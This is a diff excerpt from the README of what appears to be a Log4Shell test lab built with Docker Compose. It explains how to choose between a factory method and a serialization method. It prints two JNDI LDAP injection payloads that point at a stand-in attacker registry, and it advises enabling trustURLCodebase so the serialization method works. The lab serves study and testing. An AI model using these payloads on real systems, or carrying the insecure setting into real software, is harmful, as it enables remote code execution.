ammrat13/log4shell-test/README.md

 and a factory, while the other involves serialization.

 The factory method is the default, but the which method to use can be chosen by modifying the payload given to the victim.
-Change the `JAVA_OPTS` environment variable in the `docker compose` file to define the `victim-payload` system property to read either the first or second line depending on whether the former or latter method is desired.
+Change the `victim`'s `JAVA_OPTS` environment variable in the `docker compose` file to define the `victim-payload` system property to read either the first or second line depending on whether the former or latter method is desired.
 ```
 $${jndi:ldap://attacker_ldap_registry:1389/cn=made-class,dc=ldap-registry,dc=attacker}
 $${jndi:ldap://attacker_ldap_registry:1389/cn=serialized-class,dc=ldap-registry,dc=attacker}
 ```

+Additionally, it seems the serialization method doesn't work on any recent Java version without manually setting the `com.sun.jndi.ldap.object.trustURLCodebase` system property to `true`.
+If that method is used, make sure to do that, again via the `JAVA_OPTS` environment variable in the `docker compose` file

 ## Exploit Resources